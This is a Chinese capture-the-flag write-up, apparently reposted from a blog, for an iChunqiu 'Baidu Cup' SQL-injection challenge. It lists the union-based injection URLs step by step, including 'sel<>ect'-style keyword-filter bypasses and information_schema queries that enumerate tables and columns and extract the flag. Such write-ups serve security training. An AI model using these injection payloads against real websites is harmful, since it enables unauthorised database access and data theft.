zoukankan      html  css  js  c++  java
  • CTF web之旅 2

    题目地址

    https://www.ichunqiu.com/battalion?t=1
    “百度杯”CTF比赛 九月场  题目名称:SQL注入

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1

    正常回显

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1

    没有回显 判断出存在注入点

    判断字段数

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1 ord<>er by 3

    用<>将order分隔开 防止被过滤掉

    判断显示位

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,2,3

    2 回显出来得知2是回显位 

    爆出数据库名

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,database(),3

    爆出表

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()

    爆出字段

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_name='info'

    爆出最终数据

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info

    得到flag

    下图是information_schema数据库结构图

  • 相关阅读:
    UE4 径向模糊radiu blur
    UE4 小笔记
    UE4 Fade out Mesh
    测试一下运行代码
    javascript——限制范围的拖拽
    javascript——拖拽函数封装
    一个等高布局的小实例
    javascript——拖拽原理小实例
    javascript——自定义右键菜单
    javascript——事件默认行为
  • 原文地址:https://www.cnblogs.com/akger/p/14335668.html
Copyright © 2011-2022 走看看